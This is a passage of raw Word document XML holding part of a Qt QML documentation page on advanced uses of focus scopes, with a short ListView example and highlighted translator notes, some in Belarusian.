      <w:r w:rsidRPr="00C62FB3">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>system does not automatically select another type to receive focus</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. That is, it is possible for there to be no currently active focus.</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34282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>See</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2261" w:history="1">
        <w:r w:rsidRPr="0034282A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick Examples - Key Interaction</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for a demonstration of moving keyboard focus between multiple areas using</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2262" w:history="1">
        <w:r w:rsidRPr="0034282A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>FocusScope</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>types.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034282A" w:rsidRPr="0034282A" w:rsidRDefault="0034282A" w:rsidP="00700D31">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1908" w:name="advanced-uses-of-focus-scopes"/>
      <w:bookmarkStart w:id="1909" w:name="_Toc483000943"/>
      <w:bookmarkStart w:id="1910" w:name="_Toc483003934"/>
      <w:bookmarkStart w:id="1911" w:name="_Toc483604286"/>
      <w:bookmarkStart w:id="1912" w:name="_Toc483605506"/>
      <w:bookmarkEnd w:id="1908"/>
      <w:r w:rsidRPr="00700D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Advanced Uses of Focus Scopes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1909"/>
      <w:bookmarkEnd w:id="1910"/>
      <w:bookmarkEnd w:id="1911"/>
      <w:bookmarkEnd w:id="1912"/>
    </w:p>
    <w:p w:rsidR="0034282A" w:rsidRPr="0034282A" w:rsidRDefault="0034282A" w:rsidP="0034282A">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C62FB3">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Focus scopes allow focus to allocation to be easily partitioned</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00252BF3">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00252BF3" w:rsidRPr="00252BF3">
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Intbu translation.</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Several QML items use it to this effect.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034282A" w:rsidRPr="0034282A" w:rsidRDefault="00490E7E" w:rsidP="0034282A">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2263" w:history="1">
        <w:r w:rsidR="0034282A" w:rsidRPr="0034282A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ListView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0034282A" w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, for </w:t>
      </w:r>
      <w:r w:rsidR="0034282A" w:rsidRPr="00A5649C">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidR="0034282A" w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, is itself a focus scope. Generally this isn't noticeable as</w:t>
      </w:r>
      <w:r w:rsidR="0034282A" w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2264" w:history="1">
        <w:r w:rsidR="0034282A" w:rsidRPr="0034282A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ListView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0034282A" w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="0034282A" w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>doesn't usually have manually added visual children. By being a focus scope,</w:t>
      </w:r>
      <w:r w:rsidR="0034282A" w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2265" w:history="1">
        <w:r w:rsidR="0034282A" w:rsidRPr="0034282A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ListView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0034282A" w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="0034282A" w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can focus the current list item without worrying about how that will effect the rest of the application.</w:t>
      </w:r>
      <w:r w:rsidR="00A5649C">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A5649C" w:rsidRPr="00A5649C">
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Intbu this advantage. What can be in other cases?</w:t>
      </w:r>
      <w:r w:rsidR="0034282A" w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> This </w:t>
      </w:r>
      <w:r w:rsidR="0034282A" w:rsidRPr="00A5649C">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>allows the current item delegate to react to key presses</w:t>
      </w:r>
      <w:r w:rsidR="0034282A" w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</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34282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB23A2">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>contrived example</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> shows how this works. Pressing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Return</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>key will print the name of the current list item.</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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle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color</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"lightsteelblue"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100</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height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lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>50</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ListView</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anchors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fill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parent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focus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model</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ListModel</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ListElement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name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"Bob"</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ListElement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name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"John"</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ListElement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name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str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Michael"</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delegate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FocusScope</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childrenRect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width</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height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childrenRect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height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x</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childrenRect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x</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y</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childrenRect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y</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TextInput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focus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kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>true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text</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name</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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Keys</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onReturnPressed</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 xml:space="preserve"> console</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log</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>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34282A">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w: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34282A">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w: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34282A">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w: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HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034282A" w:rsidRPr="0034282A" w:rsidRDefault="0034282A" w:rsidP="0034282A">
      <w:pPr>
        <w:pStyle w:val="centeralign"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://doc.qt.io/qt-5/images/declarative-qmlfocus5.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/declarative-qmlfocus5.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005A2BD2">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="005A2BD2">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/declarative-qmlfocus5.png"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"http://doc.qt.io/qt-5/images/declarative-qmlfocus5.png"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"http://doc.qt.io/qt-5/images/declarative-qmlfocus5.png"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"http://doc.qt.io/qt-5/images/declarative-qmlfocus5.png"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"http://doc.qt.io/qt-5/images/declarative-qmlfocus5.png"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"http://doc.qt.io/qt-5/images/declarative-qmlfocus5.png"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"http://doc.qt.io/qt-5/images/declarative-qmlfocus5.png"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"http://doc.qt.io/qt-5/images/declarative-qmlfocus5.png"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"http://doc.qt.io/qt-5/images/declarative-qmlfocus5.png"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"http://doc.qt.io/qt-5/images/declarative-qmlfocus5.png"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"http://doc.qt.io/qt-5/images/declarative-qmlfocus5.png"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"http://doc.qt.io/qt-5/images/declarative-qmlfocus5.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002230B8">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_i1058" type="#_x0000_t75" alt="" style="width:1in;height:36.3pt">
            <v:imagedata r:id="rId2266" r:href="rId2267"/>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00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034282A" w:rsidRPr="0034282A" w:rsidRDefault="0034282A" w:rsidP="0034282A">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>While the example is simple, there is a lot going on behind the scenes.</w:t>
      </w:r>
      <w:r w:rsidR="00AB23A2">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AB23A2" w:rsidRPr="00AB23A2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Разнавіднасць з’явы з пункту гледжання супастаўлення знешняга бачання і ўнутранай структуры</w:t>
      </w:r>
      <w:r w:rsidR="00AB23A2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>. Аспекты траз</w:t>
      </w:r>
      <w:r w:rsidR="00AB23A2" w:rsidRPr="00AB23A2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Whenever the current item changes, the</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2268" w:history="1">
        <w:r w:rsidRPr="0034282A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ListView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sets the delegate's</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Item::focus</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property. As the</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2269" w:history="1">
        <w:r w:rsidRPr="0034282A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ListView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is a focus scope, this doesn't affect the rest of the application. However, if the</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2270" w:history="1">
        <w:r w:rsidRPr="0034282A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ListView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>itself has active focus this causes the delegate itself to receive active focus. In this example, the root type of the delegate is also a focus scope, which in turn gives active focus to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Text</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type that actually performs the work of handling the</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Return</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>key.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034282A" w:rsidRPr="0034282A" w:rsidRDefault="0034282A" w:rsidP="0034282A">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB23A2">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>All of the QML view classes, such as</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB23A2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2271" w:history="1">
        <w:r w:rsidRPr="00AB23A2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>PathView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00AB23A2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
